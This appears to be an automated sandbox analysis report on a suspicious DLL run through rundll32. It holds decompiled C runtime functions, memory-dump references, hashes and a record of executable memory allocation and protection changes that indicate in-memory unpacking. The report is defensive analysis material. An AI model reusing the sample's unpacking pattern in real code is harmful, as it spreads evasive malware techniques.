0x6e1b008d
0x6e1b0096
0x6e1b0096
0x6e1b0099
0x6e1b008f
0x6e1b008f
0x6e1b008f
0x6e1b009e
0x6e1b009e
0x00000000
0x6e1b009e
0x6e1b0083
0x6e1b0086
0x00000000
0x6e1b0086
0x6e1b0056
0x6e1b0058
0x00000000
0x6e1b0058
0x6e1aff40
0x6e1aff42
0x00000000
0x00000000
0x6e1aff44
0x6e1aff46
0x6e1aff48
0x6e1aff48
0x6e1aff55
0x00000000
0x6e1aff55
0x6e1aff27
0x6e1aff29
0x6e1aff7a
0x6e1aff7a
0x00000000
0x6e1aff7a
0x6e1aff2d
0x6e1aff2e
0x00000000
0x6e1aff2e
0x6e1afee7
0x6e1afeea
0x00000000
0x00000000
0x00000000
0x6e1afeea
0x6e1afebd
0x6e1afe42
0x6e1afe49
0x6e1afe4e
0x6e1afe54
0x00000000
0x6e1afe54
0x6e1afe44
0x6e1afe47
0x00000000
0x00000000
0x00000000

APIs

__aulldvrm.LIBCMT ref: 6E1AFF8C

Strings

+, xrefs: 6E1AFEC7
-, xrefs: 6E1AFEBA

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 255c4bae08dd4d5e50117eb0d92e0356964a082fc5351887b038d3193fcd9c22
Instruction ID: 37581f725aa08c49718f76ff42aaa230a750af6142399866aa4db050107eeb43
Opcode Fuzzy Hash: 255c4bae08dd4d5e50117eb0d92e0356964a082fc5351887b038d3193fcd9c22
Instruction Fuzzy Hash: 2191F335D042499EDF10CEEDC4906FDBBB1EF2A364F31825AE974A7391E3308985AB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE0F3, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E1AE0F3(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				void* _t59;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						_push(_t59);
						E6E1B8986(_t48, _t57, _t59);
						E6E1B8392(_t57, 0, 0x6e2130c0, 0x104);
						_t26 =  *0x6e213888; // 0xa73390
						 *0x6e213874 = 0x6e2130c0;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6e2130c0;
							_v20 = 0x6e2130c0;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6E1AE71C(E6E1AE38E( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6E1AE38E( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6E1B8221(_t48, 0, _t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6e21387c = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6e213880 = _t58;
											L18:
											E6E1B110D(_t37);
											_v12 = 0;
											L19:
											E6E1B110D(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6e21387c = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6e213880 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6E1B100B(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6E1B100B(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6E1AD950();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x6e1ae0f3
0x6e1ae0fc
0x6e1ae101
0x6e1ae10b
0x6e1ae10e
0x6e1ae12b
0x6e1ae12b
0x6e1ae12c
0x6e1ae13f
0x6e1ae144
0x6e1ae14c
0x6e1ae152
0x6e1ae155
0x6e1ae157
0x6e1ae15e
0x6e1ae15e
0x6e1ae160
0x6e1ae163
0x6e1ae166
0x6e1ae16d
0x6e1ae186
0x6e1ae18b
0x6e1ae18d
0x6e1ae1ae
0x6e1ae1b6
0x6e1ae1b9
0x6e1ae1d4
0x6e1ae1d7
0x6e1ae1de
0x6e1ae1e2
0x6e1ae1e4
0x6e1ae1eb
0x6e1ae1ee
0x6e1ae1f0
0x6e1ae1f2
0x6e1ae1f4
0x6e1ae1fe
0x6e1ae1fe
0x6e1ae200
0x6e1ae206
0x6e1ae209
0x6e1ae20b
0x6e1ae211
0x6e1ae212
0x6e1ae218
0x6e1ae21b
0x6e1ae21c
0x6e1ae222
0x6e1ae225
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1ae1f6
0x6e1ae1f6
0x6e1ae1f6
0x6e1ae1f9
0x6e1ae1fa
0x6e1ae1fa
0x00000000
0x6e1ae1f6
0x6e1ae1e6
0x00000000
0x6e1ae1e6
0x6e1ae1be
0x6e1ae1be
0x6e1ae1bf
0x6e1ae1c4
0x6e1ae1c6
0x6e1ae1c8
0x6e1ae1cd
0x6e1ae1cd
0x00000000
0x6e1ae1cd
0x6e1ae18f
0x6e1ae194
0x6e1ae196
0x6e1ae197
0x00000000
0x6e1ae197
0x6e1ae159
0x6e1ae15c
0x00000000
0x00000000
0x00000000
0x6e1ae15c
0x6e1ae110
0x6e1ae113
0x00000000
0x00000000
0x6e1ae115
0x6e1ae11c
0x6e1ae11d
0x6e1ae11f
0x6e1ae124
0x00000000
0x6e1ae124
0x00000000

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E1AE136, 6E1AE13D, 6E1AE173

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 42796a23b36a18822140783f1ba3a2514fcc6a055844375e5680f69a1657e28e
Instruction ID: a0bf159605d164c24f212d894602a4ace04bfe2c501dd4ea2e2200e491d516cf
Opcode Fuzzy Hash: 42796a23b36a18822140783f1ba3a2514fcc6a055844375e5680f69a1657e28e
Instruction Fuzzy Hash: B0415075E00629AFCB11DBDD8884DEEBBFAEB99710B11046AE614D7200D7709BC0EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1934C0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E6E1934C0(void* __ebx, signed int* __ecx, void* __edx) {
				void* __edi;
				intOrPtr _t25;
				signed int _t29;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				signed int _t50;
				intOrPtr* _t51;
				void* _t53;
				intOrPtr* _t55;
				intOrPtr* _t57;
				signed int* _t61;
				intOrPtr _t63;
				signed int _t67;
				void* _t70;

				_t53 = __edx;
				_t61 = __ecx;
				_t55 =  *((intOrPtr*)(_t70 + 0x14));
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				_t67 =  *(_t55 + 0x10);
				if( *((intOrPtr*)(_t55 + 0x14)) >= 0x10) {
					_t55 =  *_t55;
				}
				if(_t67 >= 0x10) {
					_t44 = _t67 | 0x0000000f;
					__eflags = _t44 - 0x7fffffff;
					_t45 =  >  ? 0x7fffffff : _t44;
					_t25 = _t45 + 1;
					__eflags = _t25 - 0x1000;
					if(_t25 < 0x1000) {
						__eflags = _t25;
						if(__eflags == 0) {
							_t50 = 0;
							__eflags = 0;
						} else {
							_push(_t25);
							_t29 = E6E199EF8(__eflags);
							_t70 = _t70 + 4;
							_t50 = _t29;
						}
						goto L11;
					} else {
						_t51 = _t25 + 0x23;
						__eflags = _t51 - _t25;
						if(__eflags <= 0) {
							E6E191260();
							goto L13;
						} else {
							_push(_t51);
							_t40 = E6E199EF8(__eflags);
							_t70 = _t70 + 4;
							__eflags = _t40;
							if(__eflags == 0) {
								L13:
								E6E1AD960(_t45, _t51, _t53, _t55, __eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t61);
								_t63 =  *((intOrPtr*)(_t70 + 8));
								asm("xorps xmm0, xmm0");
								_push(_t55);
								_t57 = _t51;
								 *_t57 = 0x6e204274;
								asm("movq [eax], xmm0");
								_t17 = _t63 + 4; // 0x6e199467
								E6E19B603(_t17, _t57 + 4);
								 *_t57 = 0x6e20eb38;
								asm("xorps xmm0, xmm0");
								_t18 = _t63 + 0xc; // 0xffffb04d
								 *((intOrPtr*)(_t57 + 0xc)) =  *_t18;
								 *((intOrPtr*)(_t57 + 0x10)) = 0x6e204274;
								asm("movq [eax], xmm0");
								_t22 = _t63 + 0x14; // 0x6e199477
								E6E19B603(_t22, _t57 + 0x14);
								 *((intOrPtr*)(_t57 + 0x10)) = 0x6e2042ec;
								 *_t57 = 0x6e20eb98;
								return _t57;
							} else {
								_t10 = _t40 + 0x23; // 0x23
								_t50 = _t10 & 0xffffffe0;
								 *((intOrPtr*)(_t50 - 4)) = _t40;
								L11:
								 *_t61 = _t50;
								E6E1A42C0(_t50, _t55, _t67 + 1);
								_t61[4] = _t67;
								_t61[5] = _t45;
								return _t61;
							}
						}
					}
				} else {
					asm("movups xmm0, [edi]");
					asm("movups [esi], xmm0");
					_t61[4] = _t67;
					_t61[5] = 0xf;
					return _t61;
				}
			}

0x6e1934c0
0x6e1934c3
0x6e1934c6
0x6e1934ca
0x6e1934d1
0x6e1934dc
0x6e1934df
0x6e1934e1
0x6e1934e1
0x6e1934e6
0x6e193509
0x6e19350c
0x6e19350e
0x6e193511
0x6e193514
0x6e193519
0x6e19353a
0x6e19353c
0x6e19354b
0x6e19354b
0x6e19353e
0x6e19353e
0x6e19353f
0x6e193544
0x6e193547
0x6e193547
0x00000000
0x6e19351b
0x6e19351b
0x6e19351e
0x6e193520
0x6e19356c
0x00000000
0x6e193522
0x6e193522
0x6e193523
0x6e193528
0x6e19352b
0x6e19352d
0x6e193571
0x6e193571
0x6e193576
0x6e193577
0x6e193578
0x6e193579
0x6e19357a
0x6e19357b
0x6e19357c
0x6e19357d
0x6e19357e
0x6e19357f
0x6e193580
0x6e193581
0x6e193585
0x6e193588
0x6e193589
0x6e19358f
0x6e193595
0x6e193599
0x6e19359d
0x6e1935a2
0x6e1935a8
0x6e1935ab
0x6e1935ae
0x6e1935b4
0x6e1935bc
0x6e1935c0
0x6e1935c4
0x6e1935cc
0x6e1935d3
0x6e1935dd
0x6e19352f
0x6e19352f
0x6e193532
0x6e193535
0x6e19354d
0x6e193550
0x6e193555
0x6e19355d
0x6e193560
0x6e193569
0x6e193569
0x6e19352d
0x6e193520
0x6e1934e8
0x6e1934e8
0x6e1934f3
0x6e1934f6
0x6e1934f9
0x6e1934ff
0x6e1934ff

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6E19359D
___std_exception_copy.LIBVCRUNTIME ref: 6E1935C4

Strings

B n, xrefs: 6E1935CC

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_copy
String ID: B n
API String ID: 2659868963-1741631525
Opcode ID: 99121308a61a92b016a9dfcbdaf5311f42a8282b9605ac0afb8fb18a5941af9c
Instruction ID: 0a047278d6cf8ab9a1c5e314c4ad91a127f04c8310ee22024c3a77fea26685c6
Opcode Fuzzy Hash: 99121308a61a92b016a9dfcbdaf5311f42a8282b9605ac0afb8fb18a5941af9c
Instruction Fuzzy Hash: A131E2F2A007059FE710CFA5D844996F7F8FF59310B108B2EE51687640E771EA94EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B87CD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6E1B87CD(void* __edx, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t39;
				char _t48;
				char _t51;
				char _t58;
				signed int _t63;
				signed int _t64;
				void* _t75;
				void* _t80;
				signed int _t85;
				void* _t92;

				_t92 = __eflags;
				_t78 = __edx;
				_push(_a16);
				_push(_a12);
				E6E1B88E6(__edx);
				_t39 = E6E1B8576(_t92, _a4);
				_v16 = _t39;
				if(_t39 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(_t63);
					_t80 = E6E1B29E9(0x220);
					_t64 = _t63 | 0xffffffff;
					__eflags = _t80;
					if(__eflags == 0) {
						L5:
						_t85 = _t64;
					} else {
						_t80 = memcpy(_t80,  *(_a12 + 0x48), 0x88 << 2);
						 *_t80 =  *_t80 & 0x00000000;
						_t85 = E6E1B8A40(_t64, _t78, _t80,  *(_a12 + 0x48), __eflags, _v16, _t80);
						__eflags = _t85 - _t64;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E6E1B586D();
							}
							asm("lock xadd [eax], ebx");
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								_t58 = _a12;
								__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x6e212220;
								if( *((intOrPtr*)(_t58 + 0x48)) != 0x6e212220) {
									E6E1B110D( *((intOrPtr*)(_t58 + 0x48)));
								}
							}
							 *_t80 = 1;
							_t75 = _t80;
							_t80 = 0;
							 *(_a12 + 0x48) = _t75;
							_t48 = _a12;
							__eflags =  *(_t48 + 0x350) & 0x00000002;
							if(( *(_t48 + 0x350) & 0x00000002) == 0) {
								__eflags =  *0x6e212748 & 0x00000001;
								if(__eflags == 0) {
									_v24 =  &_a12;
									_v20 =  &_a16;
									_t51 = 5;
									_v16 = _t51;
									_v12 = _t51;
									_push( &_v16);
									_push( &_v24);
									_push( &_v12);
									E6E1B8433(__eflags);
									__eflags = _a8;
									if(_a8 != 0) {
										 *0x6e212214 =  *_a16;
									}
								}
							}
						} else {
							 *((intOrPtr*)(E6E1B100B(__eflags))) = 0x16;
							goto L5;
						}
					}
					E6E1B110D(_t80);
					return _t85;
				} else {
					return 0;
				}
			}

0x6e1b87cd
0x6e1b87cd
0x6e1b87d5
0x6e1b87d8
0x6e1b87db
0x6e1b87e3
0x6e1b87ee
0x6e1b87f7
0x6e1b87fd
0x6e1b880a
0x6e1b880c
0x6e1b8810
0x6e1b8812
0x6e1b8842
0x6e1b8842
0x6e1b8814
0x6e1b8821
0x6e1b8827
0x6e1b882f
0x6e1b8833
0x6e1b8835
0x6e1b8852
0x6e1b8856
0x6e1b8858
0x6e1b8858
0x6e1b8863
0x6e1b8867
0x6e1b8868
0x6e1b886a
0x6e1b886d
0x6e1b8874
0x6e1b8879
0x6e1b887e
0x6e1b8874
0x6e1b887f
0x6e1b8885
0x6e1b888a
0x6e1b888c
0x6e1b888f
0x6e1b8892
0x6e1b8899
0x6e1b889b
0x6e1b88a2
0x6e1b88a7
0x6e1b88b2
0x6e1b88b5
0x6e1b88b6
0x6e1b88b9
0x6e1b88bf
0x6e1b88c3
0x6e1b88c7
0x6e1b88c8
0x6e1b88cd
0x6e1b88d1
0x6e1b88dc
0x6e1b88dc
0x6e1b88d1
0x6e1b88a2
0x6e1b8837
0x6e1b883c
0x00000000
0x6e1b883c
0x6e1b8835
0x6e1b8845
0x6e1b8851
0x6e1b87f9
0x6e1b87fc
0x6e1b87fc

APIs

Part of subcall function 6E1B8576: GetOEMCP.KERNEL32(00000000,6E1B87E8,6E1BAA5F,00000000,00000000,00000000,00000000,?,6E1BAA5F), ref: 6E1B85A1

_free.LIBCMT ref: 6E1B8845

Strings

"!n, xrefs: 6E1B886D

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: "!n
API String ID: 269201875-2620046096
Opcode ID: 46429c038eba2fcb43b1dada502c7e64a11d8a4c73de201a18c18cea9ef053a6
Instruction ID: 92ee7f7ac283ad615f06e5c48cd5a54282a0059508ebdd8a329da7bbf05f4243
Opcode Fuzzy Hash: 46429c038eba2fcb43b1dada502c7e64a11d8a4c73de201a18c18cea9ef053a6
Instruction Fuzzy Hash: C931CF7290424AAFDB01DFA8D880BCE7BF9EF45714F150469E9149B2A0EB31DDD0EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E19FCC3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6E19FCC3(void* __ebx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				char* _v16;
				char* _v20;
				char _v28;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr* _t36;
				intOrPtr _t47;

				E6E19D4C8( &_v12, _a8);
				_t28 =  *0x6e21304c; // 0x0
				_t47 =  *_t28;
				if(_t47 == 0) {
					_t29 = E6E19D50F( &_v28, 1);
					goto L9;
				} else {
					if(_t47 == 0x3f) {
						 *0x6e21304c = _t28 + 1;
						_v20 = 0;
						_v16 = 0;
						_t36 = E6E19F5FF(0,  &_v28,  &_v12, 0,  &_v20, 0);
						_v12 =  *_t36;
						_v8 =  *((intOrPtr*)(_t36 + 4));
						E6E1A13D2(__ebx, _a4,  &_v12);
					} else {
						if(_t47 == 0x58) {
							 *0x6e21304c = _t28 + 1;
							_push( &_v20);
							if(_v12 != 0) {
								_v20 = "void ";
								_v16 = 5;
								_t29 = E6E19D46F( &_v28);
								L9:
								E6E19D8A2(_t29, _a4,  &_v12);
							} else {
								_v20 = "void";
								_v16 = 4;
								E6E19D46F(_a4);
							}
						} else {
							E6E1A13D2(__ebx, _a4,  &_v12);
						}
					}
				}
				return _a4;
			}

0x6e19fccf
0x6e19fcd4
0x6e19fcd9
0x6e19fcdd
0x6e19fd82
0x00000000
0x6e19fce3
0x6e19fce6
0x6e19fd43
0x6e19fd51
0x6e19fd58
0x6e19fd5c
0x6e19fd63
0x6e19fd69
0x6e19fd73
0x6e19fce8
0x6e19fceb
0x6e19fd05
0x6e19fd0d
0x6e19fd0e
0x6e19fd2b
0x6e19fd32
0x6e19fd39
0x6e19fd87
0x6e19fd90
0x6e19fd10
0x6e19fd13
0x6e19fd1a
0x6e19fd21
0x6e19fd21
0x6e19fced
0x6e19fcf4
0x6e19fcfa
0x6e19fceb
0x6e19fce6
0x6e19fd99

APIs

Part of subcall function 6E19D4C8: pDNameNode::pDNameNode.LIBCMT ref: 6E19D4EE

DName::DName.LIBVCRUNTIME ref: 6E19FD82
DName::operator+.LIBCMT ref: 6E19FD90

Strings

hT n, xrefs: 6E19FD2B

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$Name::Name::operator+NodeNode::p
String ID: hT n
API String ID: 3257498322-2347626081
Opcode ID: 65830417024bd86d5816c3f503590797d8ebc3fa3eaeadeb4515bdc804c96023
Instruction ID: 38c56bb664e986228aa47744653f0c7e2acdebf65d6a5d03e8caa044aae4e274
Opcode Fuzzy Hash: 65830417024bd86d5816c3f503590797d8ebc3fa3eaeadeb4515bdc804c96023
Instruction Fuzzy Hash: EB212AB5800209BFDF04DFD4C855AFE7BF9AB08314F50845AE62597240EB74AA84EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19DA48, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E19DA48(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr _t5;
				void* _t13;
				intOrPtr _t20;
				intOrPtr* _t22;

				_t22 = __ecx;
				if( *((char*)(__ecx + 4)) <= 1) {
					_t20 = _a4;
					if(_t20 != 0) {
						_t13 = 0;
						if( *__ecx != 0) {
							_t5 =  *((intOrPtr*)(_t20 + 4));
							if(_t5 == 0 || _t5 == 1) {
								if(E6E1A0BB7(0x6e213068, 8) != 0) {
									_t13 = E6E19D6C4(_t6, _t20);
								}
								E6E19D2BD(_t22, _t13);
							} else {
								E6E19DAAC(__ecx, _t5);
							}
						} else {
							E6E19D752(__ecx, _t20);
						}
					}
				}
				return _t22;
			}

0x6e19da4c
0x6e19da52
0x6e19da55
0x6e19da5a
0x6e19da5d
0x6e19da61
0x6e19da6b
0x6e19da70
0x6e19da8f
0x6e19da99
0x6e19da99
0x6e19da9e
0x6e19da76
0x6e19da7a
0x6e19da7a
0x6e19da63
0x6e19da64
0x6e19da64
0x6e19daa3
0x6e19daa4
0x6e19daa9

APIs

DName::operator+=.LIBCMT ref: 6E19DA7A

Part of subcall function 6E19D752: pDNameNode::pDNameNode.LIBCMT ref: 6E19D77A

Strings

h0!n, xrefs: 6E19DA83

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$Name::operator+=NodeNode::p
String ID: h0!n
API String ID: 2687079329-3710434524
Opcode ID: 9b4908d6b77731bcc04dbc56d24da3c0f4e8ee5d8d07a62251c0cbbb4e3fa132
Instruction ID: bbf09733e143eb989f1052c3a2bd1025caf2179bc5c30de8700779a30849c7c3
Opcode Fuzzy Hash: 9b4908d6b77731bcc04dbc56d24da3c0f4e8ee5d8d07a62251c0cbbb4e3fa132
Instruction Fuzzy Hash: 09F0507174C7112AD700E9FD48606BAE39E5FB3908710492EAD549F140DBD5D8E1BF93

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A05F7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A05F7(void* __ebx, intOrPtr _a4, intOrPtr _a8) {
				char _v12;
				char _v20;
				char _v28;
				signed int* _t18;
				void* _t20;
				signed int* _t27;

				_t20 = __ebx;
				_t27 = E6E1A0BB7(0x6e213068, 8);
				if(_t27 == 0) {
					_t27 = 0;
				} else {
					 *_t27 =  *_t27 & 0x00000000;
					_t27[1] = _t27[1] & 0x00000000;
				}
				E6E19FCC3(_t20, _a4, _t27);
				E6E19FC95( &_v12);
				_t18 = E6E19D8A2(E6E19D8C4( &_v12,  &_v20, 0x20),  &_v28, _a8);
				 *_t27 =  *_t18;
				_t27[1] = _t18[1];
				return _a4;
			}

0x6e1a05f7
0x6e1a060a
0x6e1a060e
0x6e1a0619
0x6e1a0610
0x6e1a0610
0x6e1a0613
0x6e1a0613
0x6e1a061f
0x6e1a0628
0x6e1a0647
0x6e1a064e
0x6e1a0656
0x6e1a065b

APIs

DName::operator+.LIBCMT ref: 6E1A0639
DName::operator+.LIBCMT ref: 6E1A0647

Strings

h0!n, xrefs: 6E1A05FD

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+
String ID: h0!n
API String ID: 2943138195-3710434524
Opcode ID: c3732a98cd178ef571eb4ddacd1281e341f0ca75a63836dcf22e8acccd22ee32
Instruction ID: 6005a7bbfb9ddf73a2ba8c7da162b960583232d48b443942a90e4394f48d0745
Opcode Fuzzy Hash: c3732a98cd178ef571eb4ddacd1281e341f0ca75a63836dcf22e8acccd22ee32
Instruction Fuzzy Hash: 28F08175900719ABCB24DBE8C815FEE7BE8AF54318F004818E9595B280EB70A584EBC0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6624 Parent PID: 6548 rundll32.exeCOMMON

Executed Functions

Function 6E2144D9, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000917,00003000,00000040,00000917,6E213F30), ref: 6E214596
VirtualAlloc.KERNEL32(00000000,00000818,00003000,00000040,6E213F92), ref: 6E2145CD
VirtualAlloc.KERNEL32(00000000,0002A83F,00003000,00000040), ref: 6E21462D
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E214663
VirtualProtect.KERNEL32(6E190000,00000000,00000004,6E2144B8), ref: 6E214768
VirtualProtect.KERNEL32(6E190000,00001000,00000004,6E2144B8), ref: 6E21478F
VirtualProtect.KERNEL32(00000000,?,00000002,6E2144B8), ref: 6E21485C
VirtualProtect.KERNEL32(00000000,?,00000002,6E2144B8,?), ref: 6E2148B2
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2148CE

Memory Dump Source

Source File: 00000004.00000002.661490882.000000006E213000.00000040.00020000.sdmp, Offset: 6E213000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: bc1f72c7cbdfa276ad70360ba2834d3793826a7943ec06afcb4158201bc80b3a
Instruction ID: fcc3c6dc17dd9625a4015eb73d62dbfacc99566e17b1de4dbeeafe6382944527
Opcode Fuzzy Hash: bc1f72c7cbdfa276ad70360ba2834d3793826a7943ec06afcb4158201bc80b3a
Instruction Fuzzy Hash: 42D159B27003059FDF158F94C888B9177EAFFC8314B0901A4EE2DAF65AD770A991CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B0D30, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B0D30(void* __eax, void* __eflags) {
				char _v12;
				int _t7;
				void* _t9;

				_t9 = CreateEventW(0, 1, 0, E6E1A3120(0x6e1b5db2,  &_v12));
				_t7 = E6E198BA0(_t6, 0);
				if((_t7 & 0x00000001) == 0) {
					SetEvent(_t9);
					_t7 = FindCloseChangeNotification(_t9); // executed
				}
				SetLastError(0);
				return _t7;
			}

0x6e1b0d53
0x6e1b0d58
0x6e1b0d62
0x6e1b0d65
0x6e1b0d6c
0x6e1b0d6c
0x6e1b0d74
0x6e1b0d7f

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,6E19164C,?,?,?,?,6E19B8E5), ref: 6E1B0D4D
SetEvent.KERNEL32(00000000,?,?,?,6E19164C,?,?,?,?,6E19B8E5), ref: 6E1B0D65
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,6E19164C,?,?,?,?,6E19B8E5), ref: 6E1B0D6C
SetLastError.KERNEL32(00000000,?,?,?,6E19164C,?,?,?,?,6E19B8E5), ref: 6E1B0D74

Memory Dump Source

Source File: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000004.00000002.656100230.000000006E190000.00000002.00020000.sdmp Download File
